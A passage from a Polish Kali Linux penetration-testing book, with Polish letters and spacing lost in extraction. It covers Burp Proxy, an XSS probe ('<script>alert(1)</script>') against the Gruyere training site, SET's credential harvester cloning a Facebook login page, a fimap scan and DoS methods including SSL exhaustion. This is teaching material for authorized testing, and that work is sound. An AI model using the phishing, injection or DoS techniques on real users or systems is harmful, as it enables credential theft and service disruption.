BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

